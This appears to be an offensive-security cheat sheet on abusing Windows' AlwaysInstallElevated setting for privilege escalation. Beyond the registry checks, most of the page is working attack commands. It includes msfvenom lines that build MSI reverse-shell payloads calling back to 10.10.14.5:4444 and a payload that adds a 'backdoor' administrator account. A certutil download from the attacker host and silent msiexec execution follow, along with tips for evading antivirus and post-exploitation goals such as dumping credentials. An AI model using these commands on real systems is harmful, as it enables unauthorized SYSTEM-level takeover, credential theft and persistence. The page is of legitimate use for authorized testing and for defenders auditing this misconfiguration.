Always Install Elevated

#Overview

The AlwaysInstallElevated registry setting allows any user to install MSI (Microsoft Installer) packages with elevated (SYSTEM) privileges. When both HKLM and HKCU keys are set to 1, an attacker can create a malicious MSI package that executes arbitrary code as SYSTEM. This is one of the simplest Windows privesc vectors when present.

#Prerequisites

• User-level shell access (cmd or PowerShell)
• Ability to run reg query (always available)
• msfvenom or WiX Toolset to generate MSI payloads

#Detection & Enumeration

rem Check both registry keys (BOTH must be set to 1)
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

rem Expected output (both must show 0x1):
rem AlwaysInstallElevated    REG_DWORD    0x1

# PowerShell check
$HKLM = Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
$HKCU = Get-ItemProperty "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
if ($HKLM.AlwaysInstallElevated -eq 1 -and $HKCU.AlwaysInstallElevated -eq 1) {
    Write-Host "AlwaysInstallElevated ENABLED - exploit with MSI payload"
}

#Exploitation / Execution

#MSFvenom MSI Payload Generation

# On attacker machine, generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o payload.msi

# Alternative: add a local admin user
msfvenom -p windows/exec CMD="net user backdoor Password123! /add && net localgroup administrators backdoor /add" -f msi -o adduser.msi

# Alternative: PowerShell reverse shell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o psrev.msi

#Executing the MSI Payload

rem Transfer payload.msi to target (certutil, iwr, smb, etc.)
certutil -urlcache -f http://10.10.14.5/payload.msi C:\Windows\Temp\payload.msi

rem Execute with msiexec (quiet mode, no UI, no restart)
msiexec /quiet /qn /i C:\Windows\Temp\payload.msi

rem /quiet = silent installation, no user interaction
rem /qn   = no GUI (completely silent)
rem /i    = install

rem For add-user payload, verify:
net user backdoor
net localgroup administrators

rem Cleanup
msiexec /quiet /qn /x C:\Windows\Temp\payload.msi
del C:\Windows\Temp\payload.msi

#PowerUp.ps1 Detection

. .\PowerUp.ps1
# Invoke-AllChecks will automatically flag AlwaysInstallElevated if enabled

# Manually check:
Get-RegistryAlwaysInstallElevated
# Returns True if both keys are set

#Common Pitfalls

• Both HKLM AND HKCU keys must be set to 1 -- if either is 0 or missing, the exploit fails
• msfvenom MSI payloads are heavily signatured by AV -- encode, encrypt, or use custom MSI builds
• Some Windows versions require the Windows Installer service to be running -- check with sc query msiserver
• Group Policy may revert the registry keys -- exploit quickly after discovery
• The msiexec /qn flag suppresses all UI, but the process is still visible in task manager

#OPSEC Considerations

• reg query is a standard command and unlikely to trigger alerts.
• msfvenom MSI payloads are signatured by Windows Defender -- likely to be quarantined on execution.
• msiexec execution is logged in the Windows Installer event log and Application event log.
• The MSI installation creates entries in the Programs and Features list.
• Consider using custom MSI builds with WiX Toolset or Orca to avoid AV signatures.

#Post-Exploitation Value

Successful exploitation provides SYSTEM-level command execution. From SYSTEM: dump credentials, create persistent admin users, install backdoors, disable security controls, pivot to domain resources. The SYSTEM shell can be upgraded to a more stable beacon or used for immediate credential extraction.

#Cross-References

#Tool References

#Source Machines

• Generic Windows machines with misconfigured AlwaysInstallElevated policy